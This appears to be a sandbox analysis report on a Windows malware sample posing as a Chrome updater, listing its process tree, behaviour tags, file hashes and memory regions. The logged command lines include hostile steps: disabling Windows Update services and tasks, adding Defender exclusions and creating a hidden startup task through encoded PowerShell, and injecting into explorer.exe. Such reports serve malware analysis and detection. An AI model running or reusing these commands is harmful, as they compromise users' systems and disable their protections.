- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdwBtAG0AIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEASABFAEEAWQBnAEEAagBBAEQANABBAEkAQQBCAFQAQQBIAFEAQQBZAFEAQgB5AEEASABRAEEATABRAEIAUQBBAEgASQBBAGIAdwBCAGoAQQBHAFUAQQBjAHcAQgB6AEEAQwBBAEEATABRAEIARwBBAEcAawBBAGIAQQBCAGwAQQBGAEEAQQBZAFEAQgAwAEEARwBnAEEASQBBAEEAbgBBAEUATQBBAE8AZwBCAGMAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAEkAQQBCAEcAQQBHAGsAQQBiAEEAQgBsAEEASABNAEEAWABBAEIASABBAEcAOABBAGIAdwBCAG4AQQBHAHcAQQBaAFEAQgBjAEEARQBNAEEAYQBBAEIAeQBBAEcAOABBAGIAUQBCAGwAQQBGAHcAQQBkAFEAQgB3AEEARwBRAEEAWQBRAEIAMABBAEcAVQBBAGMAZwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAdABBAEYAWQBBAFoAUQBCAHkAQQBHAEkAQQBJAEEAQgBTAEEASABVAEEAYgBnAEIAQgBBAEgATQBBAEkAQQBBADgAQQBDAE0AQQBiAFEAQgB6AEEAQwBNAEEAUABnAEEAPQAiACcAKQAgADwAIwBvAGoAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBuAGkAZwBkACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAcAB5ACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAZQB4AHMAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAA1ADgAZQA4ADAAMQBkAGYAZABhAGEANwA1AGUAZgA5ADcANwBmAGUAYQAwADEAYQAyADAAMABmADkAMABlADcAMgAwADIANAAwADYAOAAzADMAYQAxAGUAMgBjADAANgBlAGIAZQAxADUAYQA5ADkAYQA3ADIAYwAzADgAOQA1AC4AZQB4AGUAJwAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACAALQBGAG8AcgBjAGUAIAA8ACMAeABqAGQAaQAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAbABvACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHEAYgAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAbQBzACMAPgA="1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "bmkeytcye"4⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe sosudejrcxm1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8dyBC4RhMJQS3ZIS6W4m7i7iEJ7cohkojQOsRFzNMr564⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD52144e985a1fb8a18636dee1b1fcf096f
SHA1fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA25658e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA51248d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD52144e985a1fb8a18636dee1b1fcf096f
SHA1fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA25658e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA51248d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD530f717dc0bedf29aa9b998e86d76a6bd
SHA177f21064eda23e6a8e98c5d0b2a35e0cb854181d
SHA2563e27184b2d400bbd8bc1baf257b372beb02cc42ec1d5d3a27c6fabbbd759ccf1
SHA5121909606e1b3ddd3adc1671cc28ffddc16da27b17378db508967558b66724c82d1b08409d2e334d85e846c01caff29a9dcbbb2022efa34f967c3e2af70d41d77e
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD517286868c0a043ae5d2ff5798b6a3163
SHA1b83b23cd57c7fb2c937f5bc18aeb7ddc955b5401
SHA25640321e18ed0b9eb7e3bc937d3e207ea2039ff45267483ddb4a51f7974475dac6
SHA512e15c11982c0569a389a7dbd0889edd1ef9a8ffb21c0e8ffadebc10e1353f4485524b18ca8e041c66c98d05fb984544da122755e6c2a25728453aeaf4175bdee1
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5d0bcbadb3ebcd041605f37019119c0b6
SHA136b16a2b0e025d40ec5a783cf78ad2ff7c38f288
SHA25620e15db7d6cf2bca7a2922cc9c4939e643b82beb7378adab586910ceed994a8b
SHA512f4fc3762d7d6ffbe10838458d13d6ff3aaa5fdc18e72ecd30697c76c83733d526eb868aa014e404861a6bf8b6881e3cda232f84444b5ba354a390fd87ea3f43a
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD5c5227366b7a688ff23b01788718251aa
SHA19795262e79c832ba49c744fcd1b1794c0ffb5c6a
SHA256789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48
SHA5128b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe
-
memory/32-175-0x0000000000000000-mapping.dmp
-
memory/160-303-0x00000193B4CF0000-0x00000193B4DA9000-memory.dmpFilesize
740KB
-
memory/160-297-0x00000193B4B20000-0x00000193B4B3C000-memory.dmpFilesize
112KB
-
memory/160-279-0x0000000000000000-mapping.dmp
-
memory/160-336-0x00000193B4B40000-0x00000193B4B4A000-memory.dmpFilesize
40KB
-
memory/212-230-0x0000000000000000-mapping.dmp
-
memory/316-430-0x0000000000000000-mapping.dmp
-
memory/372-188-0x0000000000000000-mapping.dmp
-
memory/420-461-0x0000000000000000-mapping.dmp
-
memory/436-272-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/436-261-0x0000000000000000-mapping.dmp
-
memory/436-264-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/436-265-0x00007FFEAC7F0000-0x00007FFEAC9CB000-memory.dmpFilesize
1.9MB
-
memory/436-266-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/436-274-0x00007FFEAC7F0000-0x00007FFEAC9CB000-memory.dmpFilesize
1.9MB
-
memory/500-190-0x0000000000000000-mapping.dmp
-
memory/516-446-0x0000000000000000-mapping.dmp
-
memory/624-464-0x0000000000000000-mapping.dmp
-
memory/644-191-0x0000000000000000-mapping.dmp
-
memory/660-463-0x0000000000000000-mapping.dmp
-
memory/700-181-0x0000000000000000-mapping.dmp
-
memory/744-444-0x0000000000000000-mapping.dmp
-
memory/1028-456-0x0000000000000000-mapping.dmp
-
memory/1096-473-0x0000000000000000-mapping.dmp
-
memory/1104-227-0x0000000000000000-mapping.dmp
-
memory/1132-240-0x0000000000000000-mapping.dmp
-
memory/1164-457-0x0000000000000000-mapping.dmp
-
memory/1340-185-0x0000000000000000-mapping.dmp
-
memory/1348-459-0x0000000000000000-mapping.dmp
-
memory/1424-466-0x0000000000000000-mapping.dmp
-
memory/1676-435-0x0000000000000000-mapping.dmp
-
memory/1812-431-0x0000000000000000-mapping.dmp
-
memory/1828-179-0x0000000000000000-mapping.dmp
-
memory/1988-229-0x0000000000000000-mapping.dmp
-
memory/1988-468-0x0000000000000000-mapping.dmp
-
memory/2024-458-0x0000000000000000-mapping.dmp
-
memory/2168-231-0x0000000000000000-mapping.dmp
-
memory/2176-238-0x0000000000000000-mapping.dmp
-
memory/2212-469-0x0000000000000000-mapping.dmp
-
memory/2284-178-0x0000000000000000-mapping.dmp
-
memory/2316-428-0x0000000000000000-mapping.dmp
-
memory/2340-176-0x0000000000000000-mapping.dmp
-
memory/2588-433-0x0000000000000000-mapping.dmp
-
memory/2588-177-0x0000000000000000-mapping.dmp
-
memory/2608-455-0x0000000000000000-mapping.dmp
-
memory/2608-189-0x0000000000000000-mapping.dmp
-
memory/2736-186-0x0000000000000000-mapping.dmp
-
memory/2752-471-0x0000000000000000-mapping.dmp
-
memory/2768-184-0x0000000000000000-mapping.dmp
-
memory/2768-462-0x0000000000000000-mapping.dmp
-
memory/2868-126-0x0000015CE3A10000-0x0000015CE3E2E000-memory.dmpFilesize
4.1MB
-
memory/2868-452-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/2868-449-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/2868-451-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/2868-453-0x0000000000BC0000-0x0000000000BE0000-memory.dmpFilesize
128KB
-
memory/2868-450-0x000000014036EAC4-mapping.dmp
-
memory/2868-127-0x0000015CFEA40000-0x0000015CFEE5E000-memory.dmpFilesize
4.1MB
-
memory/2868-474-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/2868-475-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/2932-427-0x0000000000000000-mapping.dmp
-
memory/3104-236-0x0000000000000000-mapping.dmp
-
memory/3144-472-0x0000000000000000-mapping.dmp
-
memory/3152-436-0x0000013C29220000-0x0000013C29232000-memory.dmpFilesize
72KB
-
memory/3152-434-0x0000013C106A0000-0x0000013C106A6000-memory.dmpFilesize
24KB
-
memory/3160-123-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/3160-118-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/3160-117-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/3160-125-0x00007FFEAC7F0000-0x00007FFEAC9CB000-memory.dmpFilesize
1.9MB
-
memory/3160-119-0x00007FFEAC7F0000-0x00007FFEAC9CB000-memory.dmpFilesize
1.9MB
-
memory/3168-193-0x0000000000000000-mapping.dmp
-
memory/3176-432-0x0000000000000000-mapping.dmp
-
memory/3228-192-0x0000000000000000-mapping.dmp
-
memory/3296-222-0x0000000000000000-mapping.dmp
-
memory/3296-467-0x0000000000000000-mapping.dmp
-
memory/3416-448-0x0000000000000000-mapping.dmp
-
memory/3448-134-0x0000000000000000-mapping.dmp
-
memory/3448-140-0x00000269723A0000-0x00000269723C2000-memory.dmpFilesize
136KB
-
memory/3448-143-0x0000026972550000-0x00000269725C6000-memory.dmpFilesize
472KB
-
memory/3536-180-0x0000000000000000-mapping.dmp
-
memory/3536-465-0x0000000000000000-mapping.dmp
-
memory/3808-228-0x0000000000000000-mapping.dmp
-
memory/3892-187-0x0000000000000000-mapping.dmp
-
memory/3904-182-0x0000000000000000-mapping.dmp
-
memory/3916-241-0x0000000000000000-mapping.dmp
-
memory/4000-183-0x0000000000000000-mapping.dmp
-
memory/4000-242-0x0000000000000000-mapping.dmp
-
memory/4000-460-0x0000000000000000-mapping.dmp
-
memory/4068-441-0x000001FC68310000-0x000001FC68316000-memory.dmpFilesize
24KB
-
memory/4068-447-0x000001FC67BF0000-0x000001FC67BF7000-memory.dmpFilesize
28KB
-
memory/4084-470-0x0000000000000000-mapping.dmp